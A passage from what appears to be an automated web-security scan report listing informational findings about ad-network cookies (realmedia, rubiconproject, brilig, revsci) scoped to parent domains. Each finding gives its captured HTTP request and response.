Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QW4uQO1018UF

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:12:41 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QW4uQO1018RL|O1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 419
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Mon, 13-Jun-2011 03:01:33 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/sbnation/ros/728x90/jx/ss/a/L27/2014070050/Top1/USNetwork/BCN2011050799_001_JacksonHewitt/JH.728x90-5.24.gif/726348573
...[SNIP]...

12.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QW4uQO1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/mavericks-tickets
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QW4uQO1018RL|O1018UF

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:14:12 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QW4uQO1018RL|O2018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 400
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Mon, 13-Jun-2011 03:03:04 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/sbnation/ros/728x90/jx/ss/a/L27/966040134/Top1/USNetwork/BCN2011050683_001_InEx/2225-728x90-A2.jpg/726348573830336e374
...[SNIP]...

12.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QW4uQO1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:18 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QW4uQO1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 400
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Mon, 13-Jun-2011 11:03:18 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/sbnation/ros/728x90/jx/ss/a/L27/992343121/Top1/USNetwork/BCN2011050683_001_InEx/2225-728x90-A2.jpg/726348573830336e374
...[SNIP]...

12.101. http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/5941/13464/26379-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=5941/13464; expires=Mon, 13-Jun-2011 12:21:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=13464^4; expires=Tue, 14-Jun-2011 04:59:59 GMT; max-age=74282; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/5941/13464/26379-2.js?cb=0.7753647894132882 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; ses2=13464^2; cd=false; lm="13 Jun 2011 11:13:38 GMT"; rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%262373%3D1%263810%3D1%262374%3D1; rdk=5941/13464; rdk9=0; ses9=13464^2

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=5941/13464; expires=Mon, 13-Jun-2011 12:21:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 13-Jun-2011 12:21:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13464^4; expires=Tue, 14-Jun-2011 04:59:59 GMT; max-age=74282; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2176

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3207538"
...[SNIP]...

12.102. http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/5941/13464/26379-9.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=5941/13464; expires=Mon, 13-Jun-2011 12:21:18 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses9=13464^4; expires=Tue, 14-Jun-2011 04:59:59 GMT; max-age=74321; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/5941/13464/26379-9.js?cb=0.601756411138922 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; lm="21 May 2011 12:38:06 GMT"; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; cd=false; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=5941/13464; ses2=13464^1; rpb=3580%3D1%264222%3D1%266811%3D1%265421%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:18 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=5941/13464; expires=Mon, 13-Jun-2011 12:21:18 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 13-Jun-2011 12:21:18 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13464^4; expires=Tue, 14-Jun-2011 04:59:59 GMT; max-age=74321; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2328

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168962"
...[SNIP]...

12.103. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Wed, 05-Jun-2041 11:23:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=1FFD15D9-3EFE-4FF0-B0E6-02D75C011D7B&_ct=pixel&publisherid=74&traffic=cpmstar&REDIR=http://server.cpmstar.com/brilig.aspx HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Date: Mon, 13 Jun 2011 11:23:25 GMT
Expires: Mon, 19 Dec 1983 11:23:26 GMT
Location: http://server.cpmstar.com/brilig.aspx
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Wed, 05-Jun-2041 11:23:26 GMT
Content-Length: 0
Connection: keep-alive

12.104. http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/A09801/b3/0/3/1008211/172737971.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EuhOQMMpjaxq2F29/xUY651hLZPPu6KLEhAA886n2e1NMyNdTd0q7tfEV6W8KYgoaC/NzJwIw+BkVbQUlyrEgVUeakyMmtzOjwGpMueNHbhQOUYQcmu+Rp/cDp+Y0GRZki85xiNnO2gL5JKomkldK1kJfL7yLCbCRJ9QWbkENIix0WUcvmOaTynbtLJXgB1O8T4TrVVI9X6xXjztB2u+fu6LAvYXEVFWWI0Y/4zlDThaAxfF5u49CV6G+4ESJ+X16acbHPlK04sKAdRmjyoU9DXU5ZKptBktG7P/hvDFQRTVmSM1vEzZxRO8ewZnOsnyLLyIpCVtnm9OScw/ee7AeT6UnuJsR2xYIQNF2Kor6bTyo8iFiAeUukbKYXskQnXnt4Y0kcxl4UzqDcBTQCasrXgbPK7n6YPC9P5j/hljSS81dTj9xqWlGSl4lWV5BbLtlTpCzYOvxK1uvl8vDuPwDkt6qm3dopndnJpIL1jv6uXn9BQCJXboXu5U/ELaWmENtdMw7m/X0lC08FJ7UT6uiIFKEFUat9yL2DJbIhDCK7dWsRXXt8aNvEFxC01iQZl/oYm0XM1WAyGmQOkSM/qWOQyq7FLLXupN2VXNWbG+6Ypw1wY341IkbPsSDI+4D4I2a8V75YusKVQhm1RGTex; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:20:05 GMT; Path=/
rtc_mGyF=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; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:20:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A09801/b3/0/3/1008211/172737971.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.nba.com%252Fmavericks%252Findex_main.html%253Fnbateams%253DTrue%2526_rsiL%253D0%26DM_EOM%3D1&C=A09801 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/index_main.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e11aa0e&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4dec54ae&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5E+huQIMpzaxu2F29/z47hsEuy70RDTXd+G914J5660Uet4p7ETo+SWdpq+vjO9FyOb/GDElu8b1fCaRSIFw62TMPNHPf1Uqx8gUmMOMvyrrcedIMSklF2GlAYMSmIrtIJZyfP4Pyydb8gGQEEVPTWfUru16M3wgUTloRa1DGnHu9DnMc1auc8rlJvnrDyarDpRAiyIQYfRUCqgexMmvNfqE58La5XcyKE+kxELSBAa1/zYpbUyjmtOB0OtvZe/sCmSBGoAR5kOdyqrD2IhtKDv6Hm7ELwKhW1/80SlfI4rFnrJLbX7UnZAInsxa5gAJo4kYyL9wP83gjFu21v+Ljbe4JXONNcHEu0Gce1eCZSt7gMMJj5hcBujncOuzwe6JValzqkoUzG3Z4l7x9W4n035r+Thm+1dBZiGPuPRK62f5dqbS5k+dfOEB2C4Ac8yHd6NRXOls5lzqtCiPtU3yh7HMbMC7FKV4ntBCpgQuJVZdV4gB5DHvE8DJH5mJADuT5I9HoKBabFdqyGaatksuvficHH6shBTimFXWQqrZvS0wJISpelTmvT6MMLL6uX+IxeAKTal7iL3J/Ugmq+Y=; rtc_uJev=MLv/+QUJZjpn51IpAxjOavnaN4hKHsFKsArs1un9DiMi54ZO4wU4y0HsTfVxQcrrHSlE5FfEOUQroSDJyCQsxdLt7/+VDDyQPWRIX0xytnLBcQo53lKbEFpO3wIAuZz8HZvTV4jq26xTQlJbMB51kHXRMAfIYvU73OSE4v31+q1AsUQlmSW4MDxsUSl5syf9EAwGgMz8aTvWQss79Aoznerv/oPoLcS3IZ+nWYWt+OUqy+XB+Z60V8o7HQEhaE3h69iJIn8VtBpn+JyggNrNZP6VE97ADibCZgnznBHV4DQAPlI5qn054L4TEnkAg74ZDWQcD2+RFoWZBsYuvxEiPGirR+WcagTHF5VLx+nbqzqWKSXuZznwqyEnYlBZlUSMiSfGOoGVGMZlj87aQGSBYaESVnBO1uZ+YvFCIZJaEs5noLzF9OvdIjFsqjm2CXCcjyBP0B3WamO/GKhCvFjJwLorslmR8lc1xhZEq2W9AThoxiDM2IPsMHPt00376pU9pxVxN4J4i7BaEsFj71txvTn8wxVHX2mJYKppvllHdj4p/TXP8vuko61EuIhnljjwr+r2y/QmWzZfKqIejE1/03rU76tNeFBRDWR8aOyipbeh+uyTUpNI4F5CYz7Gvx2cycfmR+h+2FFCiEnrGz5xIiEZe+vlbLuOP1Teb0Mm5AoWhxh5E4NHL8ip21OpNqRAst/Owp+rabyr+y/wSDSU+PgbsrPOrZuP5DdctZS2vZ31/BspFFynU0vInbd6C8M41e7tObXyHbSc6JY6oL+ry8yJypsCxvlch7UL9bFNYKo3QoHT/b0K24rjLq7b5CyoVKlSHFsYW/nT1UbxVRlK9xjsUKgOW8+WD7LLJ9aLBOSXxXEa2gDU+FShT/yVZ5ST8Gz7fXtIczqrXFvAz8gojNIMCeZLGGJGSr78JZ9B5hC0PJWZsjLvZEMR9emYXBe71pQr3U5g6O2gnG1Q1x4RFm1ZsuLTctS2Np44xP9z1I01uEqcYVAaRagWGq3VZfYeqkuoIKPi9MID+Ndo1pamWoRhdiBEgrN8lO7+XLOBqApQ7zAcuZmjE79m8JfUvicISIu1O2QI93UXBytj5kmlaOEzXPGeEPnLopVuqvJFT7XOoD95J4ws49PwJ+b41WcNJEVpXCnmGfcw8Ej5o/D5gQrEGOQbM2/Di7zsqPFXCk86l8pOcnoG0KnNkQOrdlhL0nMtTPxLFVJrxsWl2mdpxlk1grOkmm7m55QD6zgCVxLlBr5W8BY3nx8MiGYxs6KwwKe9uC+UDtslJGuHjK3vuQ5LI5FUjgWFctA6iJzjR0icFenZZ//wsVxgnH/AWVfu6vF+4a3RpKHlQXo/pra89IahUKf47qaLJWe+MNyvehXi5zuM84yZ4jFAGTkXh3HNCMYB16La9jg3t61HuYu2OIPNgP2I6I8tKA/ddo95qmopGg1jO43mLmFxgw4jb3T5pohnBBGs9+VPqCDIH6fSfj4KT+Rq+SNTGT7GfVEEKjwlKoNUNuIfawbdFDh6vB1VD0LW3DoOKTu7bNZ0zmnOWEjGMwebwQJRel1UTreh58fk0xF4gmP2UyeCCLNFcjK1vTciJUUwxoD2b2Y4enJAjiKy+KHl4t4BEUiBU+PwDLGt2Yc2brjSeJv7T6uHZrAsKqTRn48kG3AJXwOH7Mx7OE1yp1NoSHAyf22LDiTxLdP56pliRIjXpaTOT5ht8EbsH2uvTGXedE4iACnn7pwC9AMI6JByiXZotWH9gO8HP2GMoEiL7+6BashzcvvO7rt5EFMabkI7WKoriB99Ei88GODv6SqOupixyBnZfVB7fNZcbPD6+XNkGjE+ne6rklaCQhg9HcHbo1AwbkR1b2wnnWzwGOlASKP3Qbsj33yIssJxC7LvmxZt5+feLVUlKnJpEHVToa0wnWJ5hbBK; rsiPus_kS5A="MLsXsqEubghv55D4+uhE8YQ5hIPjXMRbVvQM7e1HYcpd6LgcNg+ebhnXYT7ZFBIJC4e2de3JBndpfztBLpdf6UXkd+6hoW965uJDp0UaT6usUjhEu2SqptP6HfD6O0Wa/Uoe7yAT8eLKNSA6mi0Ldhc5DoPyYIJfv22JaTag4m+LlJyaw5+Zm7iJR47jBiHKphmDUmIdlLu9gPODeCzcVSwBovTDqmGfxl7gKRrd+VamQJVx8LbDY6MYjhZjyUyyZN+XbWMkjXBoqSh0EZydmdMsl3J6LM0ygwU12TlaDlYW4CDjSu8sw9n1N3IYpjFup3hpn1oCaP74NkLwEVVGsyFGFKOB6mlJb0uvf0o8V7DF7KJ5o0R+YmCWhZvRaRvWMh/wqjPqNbXWXaODjWVaBt1OcYBckCTvD57yLR6vYXmH3j8ScMIpQL78mU51yDtzRDFDm1Rhfd2heM8nhUpw32dHyJWNN2qxiKVig8HbE3SrAGpqG9qxi2BotlJyyKsf8eA+y3AdxMVZiylB/J0jrzLkaymSOSf/D57dYDTIdWvju3EUgLKhOXRKUxFi33oTLmfUinuNFe1MuCvboPLW8t8j8fR+F4DcFIlgXb+95LIVFmn2OUqVYNQEMjwP0V6XYOLidHW6kmZgFNs1FMGkN6vuncIgFfBUmVG007x8exQ4WWHD1wyo5CwwLH30yzZqiZufxXdE+YEQgH8K4W8a2GBUcMl6WqSNNthstk//hylcT5FgpQD74FKIiAVTxOPOKSq1P++iv2A961xJB5oEtpfEKFNtaYmQl3xp7/Fp9W9FAQp2u6GsF5fGVLNnOe7mFIRtACYaqZROWTUG8n0UM8liaSkMWbYUtTd5g9treFs9ypwc5cRsrMM/W8DQPAPkgPAjpSjqZtamubDduoQKbIZTZl848vEPXQ9l/gRGX8xDFVW4ATYYGpPVubYpf4zRmoC6Gy1mbvMnaUK+QCk/Nk0dO0e2e3FqLhuC/TRNE38iMy/t1tKh6bqKcmS7lnYPReinWWsjlrpnxtD4+Qm1NhgfdyP4C/HPlTyFZ0VbQwAQ0LvUEi3cEh6Z0eHsldv4bgJLoS2XC1444M0Hf6kpdnkO1DgZ+5kM3cqXTuuYh/6WWerP07iY/ukEOwzvd1kSVcFPkAYJdQPWAvi26yZxyJnhXvaetiNGpaXX2rgTbwY2MZOQ/t/b75CNYrFCUck="; 